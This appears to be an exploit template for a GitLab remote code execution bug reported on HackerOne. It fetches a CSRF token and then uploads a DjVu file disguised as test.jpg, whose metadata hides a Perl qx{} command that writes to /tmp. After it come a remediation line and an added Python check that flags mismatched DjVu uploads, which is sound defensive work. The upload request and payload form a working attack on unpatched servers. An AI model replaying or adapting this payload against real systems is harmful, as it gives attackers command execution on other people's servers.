Reference: https://hackerone.com/reports/1154542
Obtain the X-CSRF-Token
GET /users/sign_in
RCE
POST /uploads/user
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5
X-CSRF-Token: {{csrf-token}}
Content-Disposition: form-data; name="file"; filename="test.jpg"
Content-Type: image/jpeg
AT&TFORM 疍JVMDIRM .? F ?蘅?!葢N?亿堣k鍰,q領觧暯⒚"?FORM ^DJVUINFO
d INCL shared_anno.iff BG44 J 婃岜7?*? BG44 鶡BG44
FORM DJVIANTa P(metadata
(Copyright "
" . qx{echo vakzz >/tmp/vakzz} .
" b ") )
Remediation:
This is fixed in GitLab version 13.10.3; update to it.
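An added example (not from the original post or from GitLab's code): the upload above is labelled test.jpg / image/jpeg, but its body starts with the DjVu signature AT&TFORM and carries an ANTa annotation chunk. This Python check flags that mismatch on a received file part; the function names and the sample bytes are assumptions constructed for illustration.

```python
import struct

JPEG_MAGIC = b"\xff\xd8\xff"
DJVU_MAGIC = b"AT&TFORM"
ANNOTATION_IDS = (b"ANTa", b"ANTz")  # DjVu annotation chunks (plain / compressed)


def iff_chunks(data, start, end, depth=0):
    """Yield (chunk_id, payload) from data[start:end], descending into nested FORMs."""
    pos = start
    while pos + 8 <= end and depth < 8:  # depth cap guards against deep nesting
        cid = data[pos:pos + 4]
        (size,) = struct.unpack(">I", data[pos + 4:pos + 8])
        body_start, body_end = pos + 8, min(pos + 8 + size, end)
        if cid == b"FORM":
            # First 4 payload bytes are the form type (DJVU, DJVM, DJVI, ...).
            yield from iff_chunks(data, body_start + 4, body_end, depth + 1)
        else:
            yield cid, data[body_start:body_end]
        pos = body_end + (size & 1)  # chunks are padded to an even length


def inspect_upload(declared_type, body):
    """Return findings for one uploaded part; an empty list means nothing was flagged."""
    findings = []
    if declared_type == "image/jpeg" and not body.startswith(JPEG_MAGIC):
        findings.append("declared image/jpeg but content is not JPEG")  # enough to reject
    if body.startswith(DJVU_MAGIC):
        findings.append("content is a DjVu container")
        for cid, _ in iff_chunks(body, 4, len(body)):
            if cid in ANNOTATION_IDS:  # triage detail: annotation text is present
                findings.append(f"DjVu annotation chunk {cid.decode()} present")
    return findings


def _chunk(cid, payload):
    """Build one IFF chunk for the constructed sample below."""
    return cid + struct.pack(">I", len(payload)) + payload + b"\x00" * (len(payload) & 1)


# Constructed, benign sample: a DjVu skeleton with a harmless annotation.
SAMPLE_DJVU = b"AT&T" + _chunk(b"FORM", b"DJVU" + _chunk(b"INFO", bytes(10))
                               + _chunk(b"ANTa", b'(metadata (Copyright "constructed"))'))
SAMPLE_JPEG = JPEG_MAGIC + b"\xe0" + bytes(16)  # constructed JPEG-like header

if __name__ == "__main__":
    for name, body in (("djvu", SAMPLE_DJVU), ("jpeg", SAMPLE_JPEG)):
        print(name, inspect_upload("image/jpeg", body))
```

The type mismatch alone is sufficient grounds to reject the file; the chunk walk only adds detail for triage and does not replace upgrading.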